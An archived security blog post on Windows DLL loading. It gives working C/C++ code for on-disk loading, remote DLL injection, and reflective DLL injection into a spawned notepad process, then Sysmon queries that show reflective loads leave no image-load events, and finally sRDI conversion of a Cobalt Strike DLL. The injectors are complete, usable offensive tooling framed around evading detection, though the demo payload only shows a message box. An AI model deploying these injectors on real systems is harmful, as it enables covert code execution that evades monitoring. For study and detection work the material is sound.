
Exploring DLL Loads, Links, and Execution

This is an archived post from 2021; I have since revisited it (TBD) ⚠

Introduction

Right, so, this is a bit of a long one. I want to go over a few methods of loading DLLs into processes, then build on that by looking at Reflective DLLs, the Sysmon events associated with loading DLLs, and finally DarkLoadLibrary, which could be a great alternative to bootstrapping DLLs.
Before we get into loading DLLs, the following statement is from Microsoft, in the What is a DLL article:
For the Windows operating systems, much of the functionality of the operating system is provided by DLL. Additionally, when you run a program on one of these Windows operating systems, much of the functionality of the program may be provided by DLLs. For example, some programs may contain many different modules, and each module of the program is contained and distributed in DLLs.
The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer.
Essentially, a DLL, or Dynamic-Link Library, is a library that contains code and data and provides a modular approach to building programs. When we use a function like LoadLibraryA, we're pulling that from kernel32.dll:
Algorithm Hash Path
--------- ---- ----
SHA256 4AC6099C86B3039356359A7D31026BF056872EBBF8A8E551A1115919E54FB772 C:\Windows\system32\kernel32.dll
Thinking about this offensively, it makes sense that DLLs being loaded into processes could be a great way to execute arbitrary code.

Loading A DLL from Disk

Let's take a look at a programmatic way of loading a given DLL into a process when that DLL is on the same disk as the executable.
The DLL that will be used for debugging:
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
break;
case DLL_THREAD_ATTACH:
MessageBoxA(nullptr, "DLL_THREAD_ATTACH", "DLL_THREAD_ATTACH", MB_OK);
break;
case DLL_THREAD_DETACH:
MessageBoxA(nullptr, "DLL_THREAD_DETACH", "DLL_THREAD_DETACH", MB_OK);
break;
case DLL_PROCESS_DETACH:
MessageBoxA(nullptr, "DLL_PROCESS_DETACH", "DLL_PROCESS_DETACH", MB_OK);
break;
}
return TRUE;
}
Depending on the way the DLL is loaded, it will throw a MessageBoxA telling us which method of attachment was used.
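For reference, the reason code passed to DllMain is just a small integer. The sketch below is portable C++ rather than code from this post: `reason_name` is a hypothetical helper, and the numeric values are the ones the Windows SDK assigns to the DLL_* constants.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Values the Windows SDK assigns to the DllMain reason codes.
constexpr std::uint32_t kDllProcessDetach = 0; // DLL_PROCESS_DETACH
constexpr std::uint32_t kDllProcessAttach = 1; // DLL_PROCESS_ATTACH
constexpr std::uint32_t kDllThreadAttach  = 2; // DLL_THREAD_ATTACH
constexpr std::uint32_t kDllThreadDetach  = 3; // DLL_THREAD_DETACH

// Hypothetical helper: map a reason code to the label the debug DLL would display.
std::string reason_name(std::uint32_t reason)
{
    switch (reason) {
    case kDllProcessAttach: return "DLL_PROCESS_ATTACH";
    case kDllThreadAttach:  return "DLL_THREAD_ATTACH";
    case kDllThreadDetach:  return "DLL_THREAD_DETACH";
    case kDllProcessDetach: return "DLL_PROCESS_DETACH";
    default:                return "UNKNOWN";
    }
}
```

A plain LoadLibraryA call should produce DLL_PROCESS_ATTACH (1); the thread values only show up when the host process creates or ends threads while the DLL is loaded.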
This could even be a one-liner:
#include <stdio.h>
#include <windows.h>
int main()
{
LPCSTR path = "..\\Release\\debug-dll.dll";
printf("%p\n", LoadLibraryA(path));
return 0;
}
Running this:
All that's happened here is that LoadLibraryA has been called on our debug-dll.dll from earlier. Here is a quick description of LoadLibraryA:
LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. LoadLibrary can also be used to load other executable modules. For example, the function can specify an .exe file to get a handle that can be used in FindResource or LoadResource. However, do not use LoadLibrary to run an .exe file. Instead, use the CreateProcess function.
If we look up the loader in Process Hacker, we can see the DLL has been linked to the Process Environment Block (PEB):
Loading the DLL into a remote process is a bit more complicated, as it requires a bit of process injection. I discussed DLL Injection in-depth in Process Injection Part 1: The Theory, so I won't go into detail here. Essentially, the following code creates a sacrificial process with CreateProcessA, writes the DLL's path into that process's memory, and starts a remote thread at LoadLibraryA so that the process loads the DLL itself.
The code:
void remote_load_dll(LPCSTR path)
{
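LPSTARTUPINFOA si = new STARTUPINFOA();
si->cb = sizeof(STARTUPINFOA); // CreateProcess expects cb to hold the structure size
PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// CreateProcessA returns a BOOL: zero means failure
if (!CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi))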
{
printf("[!] Failed to create process!\n");
return;
}
else
{
printf(" :: Process ID: %d\n", pi->dwProcessId);
printf(" :: Process Handle: %p\n", pi->hProcess);
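// Include the terminating NUL so LoadLibraryA sees a complete string in the remote process
SIZE_T len = strlen(path) + 1;
// The buffer only holds the path string, so read/write access is enough
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf(" :: Base Address: %p\n", pAddress);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);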
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
printf(" :: THREAD_START_ROUTINE: %p\n", pRoutine);
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
printf(" :: Thread: %p\n", hThread);
if (pi->hProcess)CloseHandle(pi->hProcess);
if (pi->hThread)CloseHandle(pi->hThread);
if (hThread)CloseHandle(hThread);
}
}
Process ID 16684 was created and injected into, loading the MessageBoxA DLL:
The issue here is that only the path is written into the target process; LoadLibraryA still reads the DLL itself from disk. In an offensive scenario, that means the malicious DLL has to be written to the target's disk first:
SIZE_T len = strlen(path) + 1; // include the terminating NUL
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
The debug-dll.dll can also be seen in the linked modules:
Let's look at a way of removing the requirement for on-disk DLLs, so the load is less obvious.

Reflective DLL

This is where Reflective DLLs come into it. Reflective DLLs allow for DLLs to be loaded entirely from memory. A good introduction to Reflective DLLs can be seen in What is Reflective DLL Injection and how can be detected?.
This technique was originally written by Stephen Fewer and the original code can be found in stephenfewer/ReflectiveDLLInjection. The repository provided by Stephen Fewer goes over how this technique works quite well:
  1. Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
  2. As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
  3. The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
  4. The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
  5. The library's headers and sections are loaded into their new locations in memory.
  6. The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
  7. The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
  8. The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
  9. Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
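Step 2 in the list above can be sketched as a backwards scan for a DOS header whose e_lfanew field points at a PE signature. This is a portable illustration over a byte buffer, not Fewer's code: `looks_like_pe` and `find_image_base` are hypothetical names, the 1024-byte upper bound on e_lfanew is an assumed sanity limit, and a little-endian host is assumed.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Offset of e_lfanew inside the DOS header (fixed by the PE format).
constexpr std::size_t kLfanewOffset = 0x3C;

// True if a plausible PE image starts at buf[pos].
static bool looks_like_pe(const std::vector<std::uint8_t>& buf, std::size_t pos)
{
    if (pos + kLfanewOffset + 4 > buf.size()) return false;
    if (buf[pos] != 'M' || buf[pos + 1] != 'Z') return false;
    std::uint32_t lfanew = 0;
    std::memcpy(&lfanew, &buf[pos + kLfanewOffset], sizeof(lfanew));
    // Assumed sanity range: past the 64-byte DOS header, but not absurdly far away.
    if (lfanew < 0x40 || lfanew > 1024) return false;
    if (pos + lfanew + 4 > buf.size()) return false;
    return std::memcmp(&buf[pos + lfanew], "PE\0\0", 4) == 0;
}

// Walk backwards from `from` (an offset known to be inside the image) to the
// start of the image. Returns buf.size() when no image is found.
std::size_t find_image_base(const std::vector<std::uint8_t>& buf, std::size_t from)
{
    if (buf.empty()) return buf.size();
    if (from >= buf.size()) from = buf.size() - 1;
    for (std::size_t pos = from + 1; pos-- > 0; ) {
        if (looks_like_pe(buf, pos)) {
            assert(pos <= from); // the base can never lie after the starting point
            return pos;
        }
    }
    return buf.size();
}
```

A stray "MZ" on its own is not enough to stop the scan; the candidate only counts when e_lfanew also lands on a "PE\0\0" signature.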
The exported function can be seen on line 49 and will be an indicator that we will look at later on. Additionally, the entirety of the ReflectiveLoader.c is very well commented. So, between the technique explanation, and the code comments, I won't describe everything it is doing.
Let's write something malicious to demonstrate the Reflective DLL process.
First off, the actual DLL. This is very similar to the debug-dll.dll from earlier, in that it will throw a MessageBoxA. The example that will follow is practically identical to ReflectiveDll.c provided by Stephen Fewer. Here is the code we will be working with:
#include "ReflectiveLoader.h"
#include <windows.h>
extern "C" HINSTANCE hAppInstance;
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
if (lpReserved != NULL)
{
*(HMODULE*)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
That is the DLL to be injected, so let's look at writing a tool to load this DLL into the target processes.
The Injector: Reflective Prerequisites
Before writing the actual injection mechanism, some utility functions are needed. I arrived at these through trial and error against the repository, stripping things back until only the minimum required functions were left, which were these two:
#include <windows.h>
#include <stdio.h>
#define WIN_X64
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef WIN_X64
DWORD dwCompiledArch = 2;
#else
// This will catch Win32 and WinRT.
DWORD dwCompiledArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currently we can only process a PE file which is the same type as the one this function has
// been compiled as, due to various offsets in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwCompiledArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwCompiledArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
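Again, the code is very well commented, but to summarise the two functions:
Rva2Offset:
Converts a Relative Virtual Address (RVA) into a raw file offset. The buffer holds the DLL exactly as it is laid out on disk rather than as it would be mapped in memory, so every RVA read from the headers has to be translated before it can be used as an index into the buffer.
GetReflectiveLoaderOffset:
Does what it says on the tin: walks the export table and uses Rva2Offset to return the file offset of the exported ReflectiveLoader function.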
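To make the RVA translation concrete, here is a minimal portable sketch of the same arithmetic. `Section` is a hypothetical, trimmed-down stand-in for IMAGE_SECTION_HEADER, and the section values used in the note that follows are made up for illustration.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical stand-in for the three IMAGE_SECTION_HEADER fields that matter here.
struct Section {
    std::uint32_t virtual_address;     // RVA at which the section is mapped
    std::uint32_t size_of_raw_data;    // number of bytes stored in the file
    std::uint32_t pointer_to_raw_data; // file offset of those bytes
};

// Translate an RVA into a file offset; returns 0 when no section covers it.
std::uint32_t rva_to_offset(std::uint32_t rva, const std::vector<Section>& sections)
{
    if (sections.empty()) return 0;
    // RVAs before the first section's raw data fall inside the headers,
    // which sit at the same offset on disk and in memory.
    if (rva < sections[0].pointer_to_raw_data) return rva;
    for (const Section& s : sections) {
        if (rva >= s.virtual_address && rva < s.virtual_address + s.size_of_raw_data) {
            assert(rva - s.virtual_address < s.size_of_raw_data);
            return rva - s.virtual_address + s.pointer_to_raw_data;
        }
    }
    return 0;
}
```

With a section mapped at RVA 0x1000 whose raw data starts at file offset 0x400, RVA 0x1234 translates to 0x1234 - 0x1000 + 0x400 = 0x634.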
With that done, let's look at getting a DLL into memory. At first, I did it the old xxd way, but the DLL came out at over 90,000 bytes, which was killing Visual Studio. So, I opted for reading the bytes from disk into an LPVOID at runtime, which is basically the same format it would be in anyway!
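DWORD ReadBytes(char* path, LPVOID* shellcode) {
    HANDLE hFile;
    DWORD size = 0, readAmount = 0;
    *shellcode = NULL; // callers never see an uninitialised pointer on failure
    hFile = CreateFileA(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE) {
        size = GetFileSize(hFile, 0);
        *shellcode = malloc(size + 16);
        // Only read if the allocation succeeded; a failed read reports 0 bytes
        if (*shellcode == NULL || !ReadFile(hFile, *shellcode, size, &readAmount, 0))
            readAmount = 0;
        CloseHandle(hFile);
    }
    return readAmount;
}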
FYI, the dll size from xxd:
unsigned int reflective_debug_dll_dll_len = 93696;
The Injector: Local
For the most part, this is a completely bog-standard injection:
Here is the code:
int main(void)
{
const char* path = "C:\\Users\\mez0\\Desktop\\reflective-dll-blog\\dll-shenanigans\\x64\\Release\\reflective-debug-dll.dll";
LPVOID buf;
DWORD bufSz = ReadBytes((char*)path, &buf);
LPVOID pAddress = nullptr;
BOOL bProtect;
HANDLE hThread;
DWORD lpflOldProtect = 0;
DWORD dwLdrOffset = 0;
pAddress = VirtualAlloc(0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(pAddress, buf, bufSz);
bProtect = VirtualProtect(pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
dwLdrOffset = GetReflectiveLoaderOffset(buf);
if (dwLdrOffset == 0) return 1; // export not found or architecture mismatch: nothing to run
LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
hThread = CreateThread(0, 0, lpStartAddress, 0, 0, 0);
Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
WaitForSingleObject(hThread, INFINITE);
}
Executing this:
There is one difference here, and it is the LPTHREAD_START_ROUTINE. Usually, it is just the base address as provided by VirtualAlloc. But this time it uses the GetReflectiveLoaderOffset function to determine the entry-point for the exported function.
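The lookup behind GetReflectiveLoaderOffset relies on three parallel arrays in the export directory: a name leads to a name ordinal, and the ordinal indexes the address array. The sketch below flattens that into plain vectors; `ExportTable` and `find_export_rva` are hypothetical names, and the file-offset translation is left out so that only the indexing is shown.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical flattened view of an export directory.
struct ExportTable {
    std::vector<std::string>   names;     // AddressOfNames
    std::vector<std::uint16_t> ordinals;  // AddressOfNameOrdinals, parallel to names
    std::vector<std::uint32_t> functions; // AddressOfFunctions, indexed by ordinal
};

// Returns the RVA of the first export whose name contains `needle`, or 0.
// A substring match mirrors the strstr() call in the original code, which also
// accepts decorated names.
std::uint32_t find_export_rva(const ExportTable& t, const std::string& needle)
{
    assert(t.names.size() == t.ordinals.size()); // the two arrays are parallel
    for (std::size_t i = 0; i < t.names.size(); ++i) {
        if (t.names[i].find(needle) == std::string::npos) continue;
        const std::uint16_t ord = t.ordinals[i];
        return ord < t.functions.size() ? t.functions[ord] : 0;
    }
    return 0;
}
```

The position of a name in the name array is not the index into the address array; the ordinal array sits in between, which is why the original code advances the name and ordinal pointers together.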
The Injector: Remote
This next piece of code is a combination of the process injection from earlier, and the GetReflectiveLoaderOffset in the previous segment:
void remote_exec(DWORD bufSz, LPVOID buf)
{
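LPSTARTUPINFOA si = new STARTUPINFOA();
si->cb = sizeof(STARTUPINFOA); // CreateProcess expects cb to hold the structure size
PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// CreateProcessA returns a BOOL: zero means failure
if (!CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi))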
{
printf("[!] Failed to create process!\n");
return;
}
else
{
printf(" :: Process ID: %d\n", pi->dwProcessId);
printf(" :: Process Handle: %p\n", pi->hProcess);
LPVOID pAddress = nullptr;
BOOL bProtect;
HANDLE hThread;
DWORD lpflOldProtect = 0;
DWORD dwLdrOffset = 0;
pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
dwLdrOffset = GetReflectiveLoaderOffset(buf);
LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
hThread = CreateRemoteThread(pi->hProcess, 0, 0, lpStartAddress, 0, 0, 0);
WaitForSingleObject(hThread, 5000);
if (pi->hProcess)CloseHandle(pi->hProcess);
if (pi->hThread)CloseHandle(pi->hThread);
if (hThread)CloseHandle(hThread);
}
return;
}
Executing this, notepad spawns and is injected into:

Investigating the loads

Now that we've looked at both a standard and a reflective DLL, let's inspect the loads. Below is a screenshot of the Reflective DLL being loaded from memory; no reflective-debug-dll.dll can be seen in the linked modules:
It makes sense: we're executing a DLL from a bootstrapped entry-point, meaning it's not a traditional DLL load. So, does it still trigger the kernel callbacks registered with the PsSetLoadImageNotifyRoutine function?
First off, startLogging.xml from cyb3rward0g is used as the configuration file for Sysmon. The event ID for image loads is 7; below is the relevant config segment:
<RuleGroup name="" groupRelation="or">
<!-- Event ID 7 == Image Loaded. Log everything except -->
<ImageLoad onmatch="exclude">
<Image condition="image">chrome.exe</Image>
<Image condition="image">vmtoolsd.exe</Image>
<Image condition="image">Sysmon.exe</Image>
<Image condition="image">mmc.exe</Image>
<Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
<Image condition="is">C:\Windows\System32\taskeng.exe</Image>
<Image condition="is">C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe</Image>
<Image condition="is">C:\Program Files\Windows Defender\NisSrv.exe</Image>
<Image condition="is">C:\Program Files\Windows Defender\MsMpEng.exe</Image>
<Image condition="end with">onedrivesetup.exe</Image>
<Image condition="end with">onedrive.exe</Image>
<Image condition="end with">skypeapp.exe</Image>
<Image condition="begin with">C:\Packages\Plugins\</Image> <!--Azure ARM Extensions -->
<Image condition="begin with">C:\WindowsAzure\</Image> <!--Azure -->
</ImageLoad>
</RuleGroup>
Generally, Get-WinEvent can be used to query Sysmon:
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational"|where {$_.id -eq 7}
As we know that the on-disk loader loads DLLs as Windows expects, we can use that to verify that Sysmon is working correctly. The screenshot below shows on-disk-loader.exe loading debug-dll.dll into the current process (denoted by the 1):
A bunch of Image loaded events are found.
To look at an event in more detail, Event Viewer can be used by going to the following path:
Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational
Then the events can be seen as such:
Or, here is a dirty little bit of PowerShell:
$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"
$loader = "on-disk-loader.exe"
$dll = "debug-dll.dll"
$since = (Get-Date).AddHours(-1) # only look at the last hour of events
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId; StartTime=$since}
foreach($event in $events)
{
$msg = $event.Message.ToString()
$image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
$imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
$utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
if($image.contains($loader) -and $imageLoaded.Contains($dll))
{
Write-Host $image loaded $imageLoaded at $utcTime
}
}
This will give something like:
Updating the script for the reflective DLL means changing $loader to the in-mem-loader PE and $dll to reflective-debug-dll.dll:
$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"
$loader = "in-mem-loader.exe"
$dll = "reflective-debug-dll.dll"
$since = (Get-Date).AddHours(-1) # only look at the last hour of events
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId; StartTime=$since}
foreach($event in $events)
{
$msg = $event.Message.ToString()
$image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
$imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
$utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
if($image.contains($loader) -and $imageLoaded.Contains($dll))
{
Write-Host $image loaded $imageLoaded at $utcTime
}
}
Below is a screenshot of the Reflective DLL being loaded and the script not finding any events:
This makes sense as a DLL is not being loaded the traditional way, but it comes with some OpSec considerations.

x64dbg tangent

The first thing I want to look at is the DLL in memory. After loading the injector in x64dbg and setting a breakpoint on VirtualAlloc, the RBP register shows the MZ magic bytes that start every PE file. The base address VirtualAlloc returns matches both the printed statement and the RBP register, and following it into a dump shows the full DOS header:
Dumping the memory to disk:
Armed with a memory dump, we can load it up into PE-Bear and see that this is the valid Reflective DLL:
To sanity check myself, I compared the in-mem-loader to the dumped file to make sure I didn't do anything weird:
Tracking down the ReflectiveLoader export is easy enough in ReflectiveLoader.c:
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME( VOID )
Where REFLDR_NAME is:
#define REFLDR_NAME ReflectiveLoader
Bit of a tangent, but cool nonetheless.
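For reference, the header checks that make a dump like this recognisable as a PE file can be sketched in portable C++. `classify_pe` and `read_le` are hypothetical helpers and a little-endian host is assumed; the constants (MZ, PE\0\0, 0x010B, 0x020B) are the same ones GetReflectiveLoaderOffset relies on.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

enum class PeKind { NotPe, Pe32, Pe32Plus };

// Read an integer out of the buffer with bounds checking and no alignment assumptions.
template <typename T>
static bool read_le(const std::vector<std::uint8_t>& buf, std::size_t off, T& out)
{
    if (off > buf.size() || buf.size() - off < sizeof(T)) return false;
    std::memcpy(&out, buf.data() + off, sizeof(T)); // little-endian host assumed
    return true;
}

PeKind classify_pe(const std::vector<std::uint8_t>& buf)
{
    std::uint16_t mz = 0;
    std::uint32_t lfanew = 0;
    std::uint32_t sig = 0;
    std::uint16_t magic = 0;
    if (!read_le(buf, 0, mz) || mz != 0x5A4D) return PeKind::NotPe;            // "MZ"
    if (!read_le(buf, 0x3C, lfanew)) return PeKind::NotPe;                     // e_lfanew
    if (!read_le(buf, lfanew, sig) || sig != 0x00004550) return PeKind::NotPe; // "PE\0\0"
    // The optional header follows the 4-byte signature and the 20-byte file header.
    if (!read_le(buf, static_cast<std::size_t>(lfanew) + 24, magic)) return PeKind::NotPe;
    if (magic == 0x010B) return PeKind::Pe32;
    if (magic == 0x020B) return PeKind::Pe32Plus;
    return PeKind::NotPe;
}
```

This only proves that the headers are plausible; it says nothing about whether the sections or exports in the dump are intact.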

An Improved Reflective DLL

Something I wanted to quickly bring to light was an improved version of the Reflective DLL that was released by Dan Staples in An Improved Reflective DLL Injection Technique in 2015. Below is a quote from the blog which describes the main improvements made:
It does this by dynamically writing some bootstrap shellcode to the target process which loads the DLL (using LoadLibraryA) and then finds and calls another exported entry point function (using GetProcAddress). While this is a great improvement to traditional DLL injection, it is not reflective.
The new code can be found in dismantl/ImprovedReflectiveDLLInjection.
The article does a great job of detailing the improvements, so I won't repeat it here; I just wanted to point out that improvements have been made to this technique since it was first published.

Shellcode Reflective DLL Injection

Everything achieved so far has required access to the DLL's source code so that the reflective loader component can be compiled into it. To remove that requirement, a project called sRDI exists. The blog post sRDI – Shellcode Reflective DLL Injection was written to support the project and goes into detail on how it works. But, essentially, it is this:
To quote the blog directly:
When execution starts at the top of the bootstrap, the general flow looks like this:
  1. Get current location in memory (Bootstrap)
  2. Calculate and setup registers (Bootstrap)
  3. Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)
  4. Un-pack DLL and remap sections (RDI)
  5. Call DLLMain (RDI)
  6. Call exported function by hashed name (RDI) – Optional
  7. Pass user-data to exported function (RDI) – Optional
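The "function hash" in the flow above lets the loader find an export without carrying its name as a readable string. The sketch below shows a rotate-right-by-13 additive hash, a scheme commonly used in shellcode for this purpose. Whether sRDI uses exactly this variant (for example, whether it also hashes the terminating NUL or the module name) is an assumption, and `ror13_hash` is a hypothetical name.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Rotate-right-by-13 additive hash over the bytes of an export name.
// Illustrative only: the exact variant a given loader uses may differ.
std::uint32_t ror13_hash(const std::string& name)
{
    std::uint32_t h = 0;
    for (unsigned char c : name) {
        h = (h >> 13) | (h << 19); // 32-bit rotate right by 13
        h += c;
    }
    return h;
}
```

The loader walks the export names, hashes each one the same way, and compares the result against the value embedded in the bootstrap. The hash is case-sensitive, so "Start" and "start" produce different values.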
As my DLL is huge, I'll use a Staged Cobalt Strike DLL. Below is the sRDI usage:
usage: ConvertToShellcode.py [-h] [-v] [-f FUNCTION_NAME] [-u USER_DATA] [-c] [-i] [-d IMPORT_DELAY] input_dll
RDI Shellcode Converter
positional arguments:
  input_dll             DLL to convert to shellcode
optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -f FUNCTION_NAME, --function-name FUNCTION_NAME
                        The function to call after DllMain
  -u USER_DATA, --user-data USER_DATA
                        Data to pass to the target function
  -c, --clear-header    Clear the PE header on load
  -i, --obfuscate-imports
                        Randomize import dependency load order
  -d IMPORT_DELAY, --import-delay IMPORT_DELAY
